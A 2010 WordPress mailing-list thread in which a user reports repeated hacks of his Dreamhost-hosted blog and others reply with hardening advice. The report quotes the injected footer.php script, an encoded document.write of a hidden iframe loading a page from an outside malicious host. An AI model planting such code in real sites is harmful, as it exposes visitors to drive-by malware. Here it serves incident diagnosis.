[wp-hackers] wordpress theme script injection (hosted on dreamhost)

Baki Goxhaj banago at gmail.com
Sun Oct 31 18:18:13 UTC 2010


>
> * On shared hosting WP is often the target, but rarely the entrance.*
>

This seems so true.

Kindly,

Baki Goxhaj
www.wplancer.com | www.banago.info | www.lintuts.com


On 31 October 2010 22:45, Ozh <ozh at ozh.org> wrote:

> Typically not a Dreamhost issue, otherwise there would be *thousands*
> of people screaming, and me in first line
>
> Being up to date with WP is fine, but most hack on shared hosting are
> not done using WP
> - check file permissions <http://codex.wordpress.org/Hardening_WordPress>
> - check other softwares & scripts running on your blog
> - change your main/SSH/FTP password
> - change your WP password
>
> I once had a WP blog hacked on Dreamhost. A few hours of investigation
> later (checking all the above + inspecting access logs) I found out
> that the insecure stuff was Scuttle (a delicious clone).
>
> On shared hosting WP is often the target, but rarely the entrance.
>
> On Sun, Oct 31, 2010 at 4:07 PM, Mladen Adamovic
> <mladen.adamovic at gmail.com> wrote:
> > Hi guys,
> >
> > My wordpress software instance was repeatedly hacked ... running latest
> > Wordpress source code and being hosted on Dreamhost.
> >
> > I don't know which exploit it did use and couldn't identify it, but it
> was
> > adding the following code to my default theme footer.php:
> >
> > <script>
> > enc =
> >
> "%3Ciframe%20width%3D1%20height%3D1%20border%3D0%20frameborder%3D0%20src%3D%27http%3A//
> > withthefirstgo.com/4/amyvaojujqinjpfqx.php%27%3E%3C/iframe%3E";
> > dec = unescape(enc);
> > document.write(dec);
> > </script>
> >
> > I think I'll have to migrate to Blogger, since I couldn't identify
> exploit
> > it did use.
> >
> > I wanted to drop you an email anyhow since identifying exploits is
> > important!
> > _______________________________________________
> > wp-hackers mailing list
> > wp-hackers at lists.automattic.com
> > http://lists.automattic.com/mailman/listinfo/wp-hackers
> >
>
>
>
> --
> http://ozh.org/
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>


More information about the wp-hackers mailing list